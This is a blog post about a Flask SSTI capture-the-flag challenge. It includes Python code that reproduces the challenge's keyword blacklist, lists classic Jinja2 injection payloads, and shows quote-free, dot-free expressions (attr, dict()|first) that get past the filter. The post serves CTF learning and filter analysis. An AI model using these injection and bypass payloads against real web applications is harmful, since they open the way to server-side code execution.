A small Flask SSTI trick

Posted by 1nhann on 2021-05-23

This newbie found a trick related to SSTI and turned it into a challenge, which is up on GitHub...

easy_ssti

  • blacklist=["request", "%", ".", "join", "\d"]

hint: how to get a string?

payload: https://twitter.com/1nhann/status/1418191781603205129
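As an added example (not the challenge's own source, and not the payload linked above), the Python below reproduces the blacklist gate in front of a Jinja2 render and shows what each entry cuts off: "." removes dotted attribute access, "%" removes `{% ... %}` statement tags (only `{{ ... }}` expressions survive), "\d" removes every subscript index and `__mro__[1]`-style payload, "join" removes the filter usually used to assemble strings from lists, and "request" removes the most common starting object. What remains is the `attr` filter and string values. The blacklist as listed does not ban quote characters, so `attr('__class__')` passes as-is; the last template additionally produces the same string with no quote at all, using Jinja2's built-in `dict` global and `first` filter (a documented Jinja2 behaviour, not necessarily the trick the author's payload uses). Assumptions: the challenge's check is approximated as substring matching for the literal entries and a regex search for `\d`, and a plain `jinja2.Environment` stands in for Flask's `render_template_string`, which would also expose `request`, `g`, `session` and friends as globals and HTML-escape the output.

```python
import re
import jinja2

# Blacklist exactly as listed in the challenge write-up. How the challenge
# applies it is not shown on the page; treating the literal entries as
# substring checks and the last entry as the regex \d is an assumption.
BLACKLIST = ["request", "%", ".", "join", r"\d"]


def is_blocked(payload: str) -> bool:
    """Return True if the payload trips any blacklist entry."""
    for entry in BLACKLIST:
        if entry == r"\d":
            if re.search(entry, payload):
                return True
        elif entry in payload:
            return True
    return False


def render(payload: str) -> str:
    """Vulnerable sink: user input becomes the template source, the same
    shape as Flask's render_template_string(user_input). A plain Jinja2
    environment stands in for Flask's (which would add request/g/session
    globals and autoescaping), so this runs without Flask installed."""
    if is_blocked(payload):
        return "blocked"
    return jinja2.Environment().from_string(payload).render()


# Textbook SSTI payloads; each one is stopped by at least one entry.
CLASSIC = [
    "{{request.application.__globals__}}",           # request, .
    "{{''.__class__.__mro__[1].__subclasses__()}}",  # ., digit
    "{% set x = config %}{{x}}",                     # %
    "{{x|join}}",                                    # join
    "{{x[0]}}",                                      # digit
]

# Expressions that survive the filter: the attr filter replaces the dot, and
# a dict key read back with |first yields a string with no quotes or digits.
# `x` is an undefined name; Jinja2 tolerates an Undefined as a dict value.
SURVIVING = {
    "{{()|attr('__class__')}}": "<class 'tuple'>",           # quotes are not banned
    "{{dict(hello=x)|first}}": "hello",                      # string from a dict key
    "{{()|attr(dict(__class__=x)|first)}}": "<class 'tuple'>",  # no quote, dot or digit
}


def check_all() -> dict:
    """Run every payload through the gate and return {payload: output}."""
    results = {p: render(p) for p in CLASSIC}
    results.update({p: render(p) for p in SURVIVING})
    return results


if __name__ == "__main__":
    for payload, out in check_all().items():
        print(f"{payload:48} -> {out}")
```

Every classic payload comes back as "blocked", while the three surviving templates render to the values in `SURVIVING`; from `<class 'tuple'>` the usual walk through `__base__`/`__subclasses__` continues with `attr()` instead of dots, which is exactly what the remaining entries (no digits, no `join`) make awkward.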